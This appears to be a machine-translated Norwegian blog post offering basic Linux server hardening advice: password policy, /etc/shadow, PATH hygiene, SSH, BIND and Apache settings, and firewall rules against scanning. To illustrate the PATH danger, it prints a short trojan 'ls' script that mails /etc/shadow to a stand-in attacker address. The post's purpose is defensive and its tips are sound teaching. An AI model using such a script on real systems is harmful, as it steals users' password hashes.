Jeg har ikke publisert noe på bloggen på lang tid, og jeg vil gjerne dele med deg noen råd hentet fra en bok som, (Blant andre). Jeg fant det ved universitetet, og jeg leste nettopp, og selv om det ærlig talt er litt utdatert og teknikkene som vises, er det svært lite sannsynlig å fungere med tanke på utviklingen av systemet, er de også interessante aspekter som kan vises.
Jeg vil avklare at de er råd orientert mot et Linux-system som brukes som en server, i middels eller kanskje stor skala, siden de på skrivebordet brukernivå, selv om de kan brukes, ville de ikke være veldig nyttige.
Jeg advarer også om at de er enkle, raske tips, og jeg vil ikke gå i detalj, selv om jeg planlegger å gjøre et annet mye mer spesifikt og omfattende innlegg om et bestemt emne. Men det får jeg se senere. La oss komme i gang.
Indeks
Passordpolicyer.
Selv om det høres ut som en slagord, gjør det å ha en god passordpolicy forskjell mellom et sårbart system eller ikke. Angrep som "brute force" dra nytte av å ha et dårlig passord for å få tilgang til et system. De vanligste tipsene er:
- Kombiner store og små bokstaver.
- Bruk spesialtegn.
- Tall.
- Mer enn 6 sifre (forhåpentligvis mer enn 8).
I tillegg til dette, la oss vurdere to viktige filer. / etc / passwd og / etc / shadow.
Noe veldig viktig er at filen / etc / passwd. Foruten å gi oss navnet på brukeren, hans uid, mappebane, bash .. etc. i noen tilfeller viser det også brukerens krypterte nøkkel.
La oss se på dens typiske sammensetning.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
bruker: kryptnøkkel: uid: gid: sti :: sti: bash
Det virkelige problemet her er at denne filen har tillatelser -rw-r - r– som betyr at den har lesetillatelser for alle brukere på systemet. og å ha den krypterte nøkkelen er ikke veldig vanskelig å tyde den virkelige.
Det er derfor filen eksisterer / etc / skygge. Dette er filen der blant annet alle brukernøklene er lagret. Denne filen har de nødvendige tillatelsene slik at ingen brukere kan lese den.
For å fikse dette da, må vi gå til filen / Etc / passwd og endre den krypterte nøkkelen til en "x", dette vil bare lagre nøkkelen i filen vår / etc / skygge.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Problemer med PATH og .bashrc og andre.
Når en bruker utfører en kommando på konsollen sin, ser skallet etter den kommandoen i en liste over kataloger som finnes i PATH-miljøvariabelen.
Hvis du skriver "echo $ PATH" i konsollen, vil den sende noe slikt.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
Hver av disse mappene er der skallet vil se etter kommandoen som er skrevet for å utføre den. Han "." det betyr at den første mappen å søke er den samme mappen der kommandoen utføres.
Anta at det er en bruker "Carlos" og denne brukeren vil "gjøre ondt." Denne brukeren kan legge igjen en fil kalt "ls" i hovedmappen sin, og i denne filen utføre en kommando som:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
Og hvis rotbrukeren for ting fra destinasjonen, prøver å liste mappene i carlos-mappen (da den først ser etter kommandoen i den samme mappen, vil det utilsiktet sende filen med passordene til denne e-posten og deretter mappene ville bli oppført, og han ville ikke finne ut av det før veldig sent.
For å unngå at vi må eliminere "." av PATH-variabelen.
På samme måte bør filer som /.bashrc, /.bashrc_profile, ./.login revideres og kontrollere at det ikke er noe "." i PATH-variabelen, og faktisk fra filer som denne, kan du endre destinasjonen til en bestemt kommando.
Tips med tjenester:
SHH
- Deaktiver versjon 1 av ssh-protokollen i sshd_config-filen.
- Ikke la rotbrukeren logge på med ssh.
- Filene og mappene ssh_host_key, ssh_host_dsa_key og ssh_host_rsa_key skal bare leses av rotbrukeren.
BINDE
- Endre velkomstmeldingen i filen named.conf slik at den ikke viser versjonsnummeret
- Begrens soneoverføringer, og aktiver det bare for lag som trenger det.
Apache
- Forhindre at tjenesten viser versjonen din i velkomstmeldingen. Rediger httpd.conf-filen og legg til eller endre linjene:
ServerSignature Off
ServerTokens Prod
- Deaktiver automatisk indeksering
- Konfigurer apache for ikke å servere sensitive filer som .htacces, * .inc, * .jsp .. osv
- Fjern mannssider eller prøve fra tjenesten
- Kjør apache i et rotet miljø
Nettverksikkerhet.
Det er viktig å dekke alle mulige oppføringer til systemet ditt fra det eksterne nettverket. Her er noen viktige tips for å forhindre at inntrengere skanner og skaffer informasjon fra nettverket ditt.
Blokkere ICMP-trafikk
Brannmuren må være konfigurert til å blokkere alle typer innkommende og utgående ICMP-trafikk og ekkosvar. Med dette unngår du at for eksempel en skanner som leter etter liveutstyr i et IP-område, vil finne deg.
Unngå TCP-ping-skanning.
En måte å skanne systemet på er TCP-ping-skanning. Anta at det på serveren din er en Apache-server på port 80. Inntrengeren kan sende en ACK-forespørsel til den porten. Med dette, hvis systemet svarer, vil datamaskinen være i live og skanne resten av portene.
For dette bør brannmuren din alltid ha muligheten "tilstandsbevissthet" og skal forkaste alle ACK-pakker som ikke tilsvarer en allerede etablert TCP-forbindelse eller økt.
Noen ekstra tips:
- Bruk IDS-systemer til å oppdage portskanning til nettverket ditt.
- Konfigurer brannmur slik at den ikke stoler på tilkoblingskildens portinnstillinger.
Dette er fordi noen skanninger bruker en "falsk" kildeport som 20 eller 53, siden mange systemer stoler på disse portene fordi de er typiske for en ftp eller en DNS.
MERK: Husk at de fleste av problemene som er angitt i dette innlegget allerede er løst i nesten alle nåværende distribusjoner. Men det gjør aldri vondt å ha nøkkelinformasjon om disse problemene, slik at de ikke skjer med deg.
MERK: Senere vil jeg se et bestemt emne, og jeg vil lage et innlegg med mye mer detaljert og aktuell informasjon.
Thaks alle for å lese.
Hilsener.
En kommentar, legg igjen din
Jeg likte artikkelen veldig og er interessert i emnet, jeg oppfordrer deg til å fortsette å laste opp innhold.